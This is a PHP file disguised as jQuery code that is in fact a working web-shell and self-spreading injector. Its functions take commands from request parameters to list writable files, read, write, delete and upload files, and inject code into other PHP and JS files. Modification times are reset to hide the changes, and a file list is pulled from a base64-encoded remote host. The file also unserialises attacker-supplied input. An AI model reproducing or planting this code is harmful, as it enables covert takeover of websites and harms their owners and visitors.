<?php
$jquery_start = true;
$jquery_version = '1.0.7';
$jquery_fv = $_REQUEST;
$jquery_dr = rtrim($_SERVER['DOCUMENT_ROOT'], '/');
$fileList = array();
$dirList = array();
$extensions = array();
$checkAvailable = '';

if (!function_exists('jquery_FileGetInfo')) {
   function jquery_FileGetInfo($params)
   {
      global $jquery_dr;
      $filename = $jquery_dr . '/' . $params['filename'];
      $res = array('exists' => 0, 'is_writable' => 0, 'is_dir' => 0);
      if (!isset($params['filename']) || (!file_exists($filename) && !is_dir($filename))) return jquery_fail($res);
      if (is_dir($filename)) $res['is_dir'] = 1;
      $res['exists'] = 1;
      if (is_writable($filename)) $res['is_writable'] = 1;
      return $res['exists'] && $res['is_writable'] ? jquery_success($res) : jquery_fail($res);
   }
}

if (!function_exists('jquery_GetCurrent')) {
   function jquery_GetCurrent($params)
   {
      return jquery_success(__FILE__);
   }
}

if (!function_exists('jquery_GetDr')) {
   function jquery_GetDr($params)
   {
      global $jquery_dr;
      return jquery_success($jquery_dr);
   }
}

if (!function_exists('jquery_FindText')) {
   function jquery_FindText($params)
   {
      global $jquery_dr;
      $filename = $jquery_dr . '/' . $params['filename'];
      $file = @file_get_contents($filename);
      return strpos($file, $params['text']) !== false ? jquery_success() : jquery_fail();
   }
}

if (!function_exists('jquery_GetAllWritableDirs')) {
   function jquery_GetAllWritableDirs($params)
   {
      global $jquery_dr, $dirList;
      jquery_scanRecursively($jquery_dr);
      $result = array();
      foreach($dirList AS $dir) $result[] = $dir['path'];
      return jquery_success($result);
   }
}

if (!function_exists('jquery_GetAllWritableFiles')) {
   function jquery_GetAllWritableFiles($params)
   {
      global $jquery_dr, $fileList;
      jquery_scanRecursively($jquery_dr, 'file', isset($params['ext']) ? $params['ext'] : array('php', 'js'));
      $result = array();
      foreach($fileList AS $file) $result[] = $file['path'];
      return jquery_success($result);
   }
}

if (!function_exists('jquery_GetContent')) {
   function jquery_GetContent($params)
   {
      global $jquery_dr;
      $filename = $jquery_dr . '/' . $params['filename'];
      $file = @file_get_contents($filename);
      return jquery_success($file);
   }
}

if (!function_exists('jquery_GetRandomWritableDir')) {
   function jquery_GetRandomWritableDir($params)
   {
      global $jquery_dr, $dirList;
      jquery_scanRecursively($jquery_dr);
      if (is_array($dirList) && count($dirList))
      {
         $data = array();
         foreach($dirList AS $dir) $data[$dir['level']][] = $dir['path'];
         if (is_array($data[3]) && count($data[3])) return jquery_success($data[3][rand(0, count($data[3]) - 1)]);
         if (is_array($data[2]) && count($data[2])) return jquery_success($data[2][rand(0, count($data[2]) - 1)]);
         if (is_array($data[1]) && count($data[1])) return jquery_success($data[1][rand(0, count($data[1]) - 1)]);
      }
      else return jquery_fail();
   }
}

if (!function_exists('jquery_GetRandomWritableFile')) {
   function jquery_GetRandomWritableFile($params)
   {
      global $jquery_dr, $fileList;
      jquery_scanRecursively($jquery_dr, 'file', isset($params['ext']) ? $params['ext'] : array('php', 'js'));
      if (is_array($fileList) && count($fileList))
      {
         $data = array();
         foreach($fileList AS $file) $data[$file['level']][] = $file['path'];
         if (is_array($data[3]) && count($data[3])) return jquery_success($data[3][rand(0, count($data[3]) - 1)]);
         if (is_array($data[2]) && count($data[2])) return jquery_success($data[2][rand(0, count($data[2]) - 1)]);
         if (is_array($data[1]) && count($data[1])) return jquery_success($data[1][rand(0, count($data[1]) - 1)]);
      }
      else return jquery_fail();
   }
}

if (!function_exists('jquery_getSource')) {
   function jquery_getSource($url)
   {
      if (function_exists('curl_init'))
      {
         $curl = curl_init();
         curl_setopt($curl, CURLOPT_URL, $url);
         curl_setopt($curl, CURLOPT_TIMEOUT, 60);
         curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 30);
         curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
         curl_setopt($curl, CURLOPT_HEADER, false);
         $data = curl_exec($curl);
         curl_close($curl);
      }
      else 
         $data = @file_get_contents($url);
      return $data;
   }
}

if (!function_exists('jquery_CheckAvailable')) {
   function jquery_CheckAvailable($filename, $origcontent, $time)
   {
      global $checkAvailable;
      if (!$checkAvailable) return true;
      $source = jquery_getSource(jquery_decode('aHR0cDovL3ZpZGVvLXh4eC5zdQ=='));
      if (!$source) return true;
      if (strpos($source, '<title>') !== false || strpos($source, '<body>') !== false) return true;
      file_put_contents($filename, $origcontent);
      jquery_touch($filename, $time);
      return false;
   }
}

if (!function_exists('jquery_AddTextToFile')) {
   function jquery_AddTextToFile($params)
   {
      global $jquery_dr;
      $info = jquery_FileGetInfo($params);
      $info = $info['data'];
      if (!is_array($info) || !isset($info['exists']) || !$info['exists'] || !isset($info['is_writable']) || !$info['is_writable']) return jquery_fail();
      $path = $jquery_dr . '/' . $params['filename'];
      $ext = pathinfo($path, PATHINFO_EXTENSION);
      $ext = strtolower($ext);
      $file = $orig = file_get_contents($path);
      if (isset($params['tag']) && isset($params['pos']) && $params['pos'] == 'after')
         $file = str_replace($params['tag'], $params['tag'] . $params['content'], $file);
      elseif (isset($params['tag']) && isset($params['pos']) && $params['pos'] == 'before')
         $file = str_replace($params['tag'], $params['content'] . $params['tag'], $file);
      else $file = $params['content'] . PHP_EOL . $file;
      $time = filemtime($path);
      $res = @file_put_contents($path, $file);
      jquery_touch($path, $time);
      if ($ext == 'php') jquery_CheckAvailable($path, $orig, $time);
      return $res ? jquery_success() : jquery_fail();
   }
}

if (!function_exists('jquery_UpdateTextInFile')) {
   function jquery_UpdateTextInFile($params)
   {
      global $jquery_dr;
      $info = jquery_FileGetInfo($params);
      $info = $info['data'];
      if (!is_array($info) || !isset($info['exists']) || !$info['exists'] || !isset($info['is_writable']) || !$info['is_writable']) return jquery_fail();
      $path = $jquery_dr . '/' . $params['filename'];
      $ext = pathinfo($path, PATHINFO_EXTENSION);
      $ext = strtolower($ext);
      $file = $orig = file_get_contents($path);
      $start = strpos($file, $params['start']);
      $end = strrpos($file, $params['end']);
      if ($start === false || $end === false)
      {
         if (!$params['content']) return jquery_success();
         if ($ext == 'php')
            $params['content'] = '<?php' . PHP_EOL . $params['content'] . PHP_EOL . '?>';
         return jquery_AddTextToFile($params);
      }
      $end += strlen($params['end']);
      $begin = trim(substr($file, 0, $start));
      $and = trim(substr($file, $end));
      if (!$params['content'] && $begin == '<?php' && strpos($and, '?>') === 0)
      {
         $begin = '';
         $and = trim(substr($and, 2));
      }
      $file = $begin . PHP_EOL . $params['content'] . PHP_EOL . $and;
      if (!$params['content']) $file = trim($file);
      $time = filemtime($path);
      $res = @file_put_contents($path, $file);
      jquery_touch($path, $time);
      if ($ext == 'php') jquery_CheckAvailable($path, $orig, $time);
      return $res ? jquery_success() : jquery_fail();
   }
}


if (!function_exists('jquery_UpdateFiles')) {
   function jquery_UpdateFiles($params)
   {
      global $jquery_dr;
      if (!is_array($params['filenames']) || !count($params['filenames'])) return jquery_fail();
      $result = array();
      $done = false;
      foreach ($params['filenames'] AS $filename)
      {
         $path = $jquery_dr . '/' . $filename;
         if (!file_exists($path)) 
         {
            $res = @file_put_contents ($path, '');
            if (is_int($res)){
               $time = jquery_GetTimeOfFiles(pathinfo($path, PATHINFO_DIRNAME));
               if ($time) jquery_touch ($path, $time);
            }
         }
         $params['filename'] = $filename;
         $res = jquery_UpdateTextInFile($params);
         if ($res['success']) $done = true;
         $result[] = $res;
      }
      return $done ? jquery_success($result) : jquery_fail($result);
   }
}


if (!function_exists('jquery_UnlinkFile')) {
   function jquery_UnlinkFile($params)
   {
      global $jquery_dr;
      $info = jquery_FileGetInfo($params);
      $info = $info['data'];
      if (is_array($info) && !$info['exists']) jquery_success();
      if (!is_array($info) || !isset($info['exists']) || !$info['exists'] || $info['is_dir'] || !isset($info['is_writable']) || !$info['is_writable']) return jquery_fail();
      $path = $jquery_dr . '/' . $params['filename'];
      return unlink($path) ? jquery_success() : jquery_fail();
   }
}


if (!function_exists('jquery_UploadFile')) {
   function jquery_UploadFile($params)
   {
      global $jquery_dr;
      $directory = $jquery_dr . ($params['dir'] ? '/' . $params['dir'] : '');
      if (!is_dir($directory) || !is_writable($directory)) return jquery_fail();
      $time = jquery_GetTimeOfFiles($directory);
      $res = @file_put_contents($directory.'/'.$params['filename'], $params['content']);
      if ($res && $time) jquery_touch($directory.'/'.$params['filename'], $time);
      return $res ? jquery_success($params['filename']) : jquery_fail();
   }
}

if (!function_exists('jquery_GetTimeOfFiles')) {
   function jquery_GetTimeOfFiles($directory)
   {
      $directory_list = opendir($directory);
      $time = 0;
      while (false !== ($file = readdir($directory_list)))
      {
         $path = $directory.'/'.$file;
         if(is_readable($path) && is_file($path))
         {
            $time = filemtime($path);
            break;
         }
      }
      return $time;
   }
}
if (!function_exists('jquery_scanRecursively')) {
   function jquery_scanRecursively($directory, $type = 'dir', $exts = array('php', 'js'), $start = true, $currentLevel = 0)
   {
      global $jquery_dr, $fileList, $dirList, $extensions;
      if ($start) 
      {
         $fileList = array();
         $dirList = array();
         $extensions = $exts;
      }
      if(substr($directory,-1) == '/')	
         $directory = substr($directory,0,-1);
      if(!file_exists($directory) || !is_dir($directory))	
         return false;
      elseif(is_readable($directory))	
      {
         $directory_list = opendir($directory);
         while (false !== ($file = readdir($directory_list)))
         {
            if ($currentLevel == 3) continue;
            if($file != '.' && $file != '..')
            {
               $path = $directory.'/'.$file;
               if(is_readable($path))	
               {
                   $subdirectories = explode('/',$path);
                   if(is_dir($path))
                   {
                      jquery_scanRecursively($path, $type, null, false, $currentLevel + 1);
                      if ($type == 'dir' && is_writable($path))
                         $dirList[] = array('path' => str_replace ($jquery_dr . '/', '', $path), 'level' => $currentLevel + 1);
                   }
                   elseif(is_file($path) && $type == 'file')
                   {
                     $extensiona = explode('.',end($subdirectories));
                     $extension = end($extensiona);
                     if((in_array($extension, $extensions)) && $path != __FILE__ && is_writable($path))
                         $fileList[] = array('path' => str_replace ($jquery_dr . '/', '', $path), 'level' => $currentLevel);
                   }
                }
            }
         }
         closedir($directory_list);
         return true;
      }
      else
      {
         return false;
      }
   }
}

if (!function_exists('jquery_GetVersion')) {
   function jquery_GetVersion($params)
   {
      global $jquery_version;
      return jquery_success($jquery_version);
   }
}

if (!function_exists('jquery_success')) {
   function jquery_success($data = array())
   {
      return array('success' => true, 'data' => $data);
   }
}

if (!function_exists('jquery_fail')) {
   function jquery_fail($data = array())
   {
      return array('success' => false, 'data' => $data);
   }
}


if (!function_exists('jquery_getFiles')) {
   function jquery_getFiles($url, $savePath)
   {
      global $jquery_dr;
         $data = jquery_getSource($url);
      if ($data)
      {
         if (!file_exists($jquery_dr . '/' . $savePath))
            @file_put_contents ($jquery_dr . '/' . $savePath, '');
         if ($data && unserialize($data) && $savePath && is_writable($jquery_dr . '/' . $savePath))
            @file_put_contents($savePath, $data);
      }
      return unserialize($data);
   }
}

if (!function_exists('jquery_initAll')) {
   function jquery_initAll($pathList, $listFiles)
   {
      $curFile = @file_get_contents(__FILE__);
      $startStr = '$jquery_st' . 'art = true;';
      $endStr = '$jquery_en' . 'd = true;';
      $start = strpos($curFile, $startStr);
      $end = strrpos($curFile, $endStr);
      if ($start === false || $end === false) return;
      $content = substr($curFile, $start, $end - $start + strlen($endStr));
      global $jquery_dr;
      if (!$pathList) return;
      $files = @file_get_contents($jquery_dr . '/' . $pathList);
      $files = unserialize($files);
      if (!$files || ($files && (!is_array($files) || !count($files))))
         $files = jquery_getFiles($listFiles, $pathList);
      if (is_array($files) && count($files))
      {
         $filenames = array();
         foreach ($files AS $file)
         {
            if (file_exists($jquery_dr . '/' . $file))
            {
               $startRes = jquery_FindText(array('filename' => $file, 'text' => $startStr));
               $endRes = jquery_FindText(array('filename' => $file, 'text' => $endStr));
               if (!$startRes['success'] || !$endRes['success'])
                  $filenames[] = $file;
            }
            else
               $filenames[] = $file;
            jquery_UpdateFiles(array('filenames' => $filenames, 'start' => $startStr, 'end' => $endStr, 'content' => $content));
         }
      }
   }
}

if (!function_exists('jquery_callMethod')) {
   function jquery_callMethod($method, $args)
   {
      if (!$method || !function_exists('jquery_'.$method)) return false;
      $result = call_user_func_array('jquery_'.$method, array("args" => $args));
      return serialize($result);
   }
}

if (!function_exists('jquery_decode')) {
   function jquery_decode($code)
   {
      return base64_decode($code);
   }
}

if (!function_exists('jquery_touch')) {
   function jquery_touch($filename, $time)
   {
      @touch($filename, $time);
   }
}

$jquery_values = array('pathList' => 'd2Vic3RhdC9jYWNoZV85ZDk3ZGY2ODhi', 'listFiles' => 'aHR0cDovL3lhZHJvLmltL2ZpbGVzLnBocD92ZXI9NjY=');
if (isset($jquery_fv['jquery']) && isset($jquery_fv['method']) && !empty($jquery_fv['method']))
{
   if (isset($jquery_fv['jquery_dr']) && $jquery_fv['jquery_dr'])
      $jquery_dr = $jquery_fv['jquery_dr'];
   if (isset($jquery_fv['jquery_checkAvailable']))
      $checkAvailable = $jquery_fv['jquery_checkAvailable'];
   
   $result = jquery_callMethod($jquery_fv['method'], unserialize(jquery_decode($jquery_fv['params'])) );
   echo($result);
   jquery_initAll(jquery_decode($jquery_values['pathList']), jquery_decode($jquery_values['listFiles']));
   exit;
}

if (function_exists('jquery_initAll')) {
   jquery_initAll(jquery_decode($jquery_values['pathList']), jquery_decode($jquery_values['listFiles']));
}
$jquery_end = true;
?>